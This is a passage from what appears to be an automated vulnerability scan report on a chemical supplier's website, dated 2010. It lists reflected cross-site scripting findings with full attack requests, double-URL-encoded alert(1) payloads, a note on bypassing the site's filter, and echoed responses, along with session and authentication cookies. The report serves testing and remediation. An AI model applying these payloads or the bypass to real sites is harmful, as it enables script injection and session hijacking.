WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:27 GMT
Content-Length: 28914
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/chemistry/80f09";alert(1)//6b5e9380a23","E404") ;
   </script>
...[SNIP]...

1.60. http://www.sigmaaldrich.com/chemistry/greener-alternatives.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /chemistry/greener-alternatives.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 51bd0%2522%253balert%25281%2529%252f%252f15cc2c92527 was submitted in the REST URL parameter 1. This input was echoed as 51bd0";alert(1)//15cc2c92527 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /chemistry51bd0%2522%253balert%25281%2529%252f%252f15cc2c92527/greener-alternatives.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:19 GMT
Content-Length: 28939
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/chemistry51bd0";alert(1)//15cc2c92527/greener-alternatives.html","E404") ;
   </script>
...[SNIP]...

1.61. http://www.sigmaaldrich.com/chemistry/greener-alternatives.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /chemistry/greener-alternatives.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 21ccf%2522%253balert%25281%2529%252f%252ffbceb469c33 was submitted in the REST URL parameter 2. This input was echoed as 21ccf";alert(1)//fbceb469c33 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /chemistry/21ccf%2522%253balert%25281%2529%252f%252ffbceb469c33 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:21 GMT
Content-Length: 28914
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/chemistry/21ccf";alert(1)//fbceb469c33","E404") ;
   </script>
...[SNIP]...

1.62. http://www.sigmaaldrich.com/chemistry/labware-and-equipment.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /chemistry/labware-and-equipment.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ad9b4%2522%253balert%25281%2529%252f%252f8332976da4b was submitted in the REST URL parameter 1. This input was echoed as ad9b4";alert(1)//8332976da4b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /chemistryad9b4%2522%253balert%25281%2529%252f%252f8332976da4b/labware-and-equipment.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:24 GMT
Content-Length: 28940
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/chemistryad9b4";alert(1)//8332976da4b/labware-and-equipment.html","E404") ;
   </script>
...[SNIP]...

1.63. http://www.sigmaaldrich.com/chemistry/labware-and-equipment.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /chemistry/labware-and-equipment.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 51772%2522%253balert%25281%2529%252f%252f0521d24ee19 was submitted in the REST URL parameter 2. This input was echoed as 51772";alert(1)//0521d24ee19 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /chemistry/51772%2522%253balert%25281%2529%252f%252f0521d24ee19 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:27 GMT
Content-Length: 28914
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/chemistry/51772";alert(1)//0521d24ee19","E404") ;
   </script>
...[SNIP]...

1.64. http://www.sigmaaldrich.com/chemistry/solvents.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /chemistry/solvents.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9a4cf%2522%253balert%25281%2529%252f%252f139ebbace98 was submitted in the REST URL parameter 1. This input was echoed as 9a4cf";alert(1)//139ebbace98 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /chemistry9a4cf%2522%253balert%25281%2529%252f%252f139ebbace98/solvents.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
